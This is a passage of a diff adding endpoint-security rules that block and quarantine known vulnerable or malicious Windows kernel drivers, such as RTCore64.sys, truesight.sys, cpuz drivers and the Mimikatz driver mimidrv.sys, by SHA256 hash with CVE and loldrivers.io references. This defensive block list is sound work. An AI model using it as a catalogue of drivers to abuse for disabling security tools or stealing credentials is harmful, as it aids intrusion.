+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607561Z",
+ "creation_date": "2026-03-23T11:45:29.607563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ff50c67d51553c08dcb7c98342f68a0f54ad6658c5346c428bdcd1f185569f6",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f88d06c-031a-5c6f-8209-7a7db9b9f4af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820954Z",
+ "creation_date": "2026-03-23T11:45:30.820957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c186967cc4f2a0cb853c9796d3ea416d233e48e735f02b1bb013967964e89778",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f8fd750-2d83-5c91-8134-22c87e089c3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616721Z",
+ "creation_date": "2026-03-23T11:45:29.616723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "038f39558035292f1d794b7cf49f8e751e8633daec31454fe85cccbea83ba3fb",
+ "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f93204f-1339-552a-a546-0502a90d332d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490066Z",
+ "creation_date": "2026-03-23T11:45:31.490068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a61c0d6e44ae7634598b91c71d8c84982c378ae341af6f7d485b808948e09630",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f957a54-c58f-5020-aa12-12549afd8993",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605156Z",
+ "creation_date": "2026-03-23T11:45:29.605158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605163Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57982057bae3808abd3417d0827fcf596f979f824cff149b2f8cdcf25b86396f",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f973f29-96dd-5120-b476-4b463d4a3bc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465596Z",
+ "creation_date": "2026-03-23T11:45:30.465599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fb1f7af-1f12-51ac-8efc-b22403b685d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611549Z",
+ "creation_date": "2026-03-23T11:45:29.611551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "057e45b47fe0ca96fe3741058bc4365c9a866dff925cab8cfea4c161b990e8e2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fbb35de-b1d9-5710-b636-a2555fc7aab4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473095Z",
+ "creation_date": "2026-03-23T11:45:30.473099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c673f2eed5d0eed307a67119d20a91c8818a53a3cb616e2984876b07e5c62547",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fc38b99-e554-5127-9ac1-60f8a9abaa7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977799Z",
+ "creation_date": "2026-03-23T11:45:29.977801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f",
+ "comment": "Vulnerable Kernel Driver (aka NetProxyDriver.sys) [https://www.loldrivers.io/drivers/c1ece07b-e92a-4050-95ee-90e03aa82120/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fc49f6c-4ee6-5663-8fbb-d14f3a4229b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826420Z",
+ "creation_date": "2026-03-23T11:45:31.826422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ec94129adcf736bbc7d4a8d9689bba64b9bba8849f420f17ab9292fa671294e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fd251fa-be87-57c4-b465-43222e0c452b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605788Z",
+ "creation_date": "2026-03-23T11:45:29.605790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fd3834b-1203-5941-9dfb-928b7d258115",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455389Z",
+ "creation_date": "2026-03-23T11:45:30.455392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2557b448d71c6873bf71f5ab41cc618d12d5c91717bf8738b6b5dce187326c2",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fd3fe23-73f3-5c78-94f6-d25c5bdec271",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141078Z",
+ "creation_date": "2026-03-23T11:45:31.141080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98c2f4a08e0d4b3f25c49ab8efa7e2875dcf084ad6592d4930e19276cf9cab48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fd9fa73-7aff-5f30-bedb-59c7629e175d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487023Z",
+ "creation_date": "2026-03-23T11:45:31.487027Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20b164228a019d203a24c761715c3b13e38b16ac01c668727cb716759162950b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fed9dd1-8f0e-5297-b6ec-70932b5996fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830997Z",
+ "creation_date": "2026-03-23T11:45:30.831001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fc6af1d7f8607539ca11cf35b0be782bf1a758f32960444045da53079a2cdce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1fee6ff8-f9dd-5f6d-bfdd-bc3669e2c8c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831308Z",
+ "creation_date": "2026-03-23T11:45:30.831310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "259f27e01cd7cbd9e62beb9387d78f1dba7d3f80da50d9156574a89ae9f6d1e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ff5c28a-683d-59ab-b69a-7b20b45d154d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817884Z",
+ "creation_date": "2026-03-23T11:45:31.817888Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac44f0d31b51f6e41d6519772d65a2e82c11f2397f999aac78b1eb16ec369bdc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ffcf12b-4af7-5153-ad94-e3bd5909452d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470221Z",
+ "creation_date": "2026-03-23T11:45:30.470224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fe1958f35b91da7819002c38642bb9408db3167bd311c637aaae6f9d45af3e4",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20075074-cd43-53c9-a00d-4f63474fc810",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983068Z",
+ "creation_date": "2026-03-23T11:45:29.983070Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983076Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf118e97d662139c1152d25a69cfa02659381aeeeea9d2222ac96fe740752c09",
+ "comment": "Vulnerable Kernel Driver (aka nstrwsk.sys) [https://www.loldrivers.io/drivers/e9b099f6-8a12-46f0-a540-40e88cf0ce17/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2009bbe1-e357-570b-be99-cae8ce3b61b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453461Z",
+ "creation_date": "2026-03-23T11:45:30.453464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bae01ea7b49bd090e198448c41293830a6e2c68821d65f69ec7dc98a16baef21",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20103ec1-1f06-5d36-b33a-4031b58b9b3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471776Z",
+ "creation_date": "2026-03-23T11:45:31.471779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471788Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a68b800d2ff84f593e6c74bfa38efa7add3d8ef5143f72fdfe5edd3ebbe6757c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20117979-2abb-5a33-b354-a5773b3e5161",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453665Z",
+ "creation_date": "2026-03-23T11:45:30.453669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fca5b647af3f792898efc1bdc008745643b417282cdee13d4edf93a4a8308a0",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20175d13-d747-553a-aba6-ab62c55ed8bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817286Z",
+ "creation_date": "2026-03-23T11:45:31.817288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
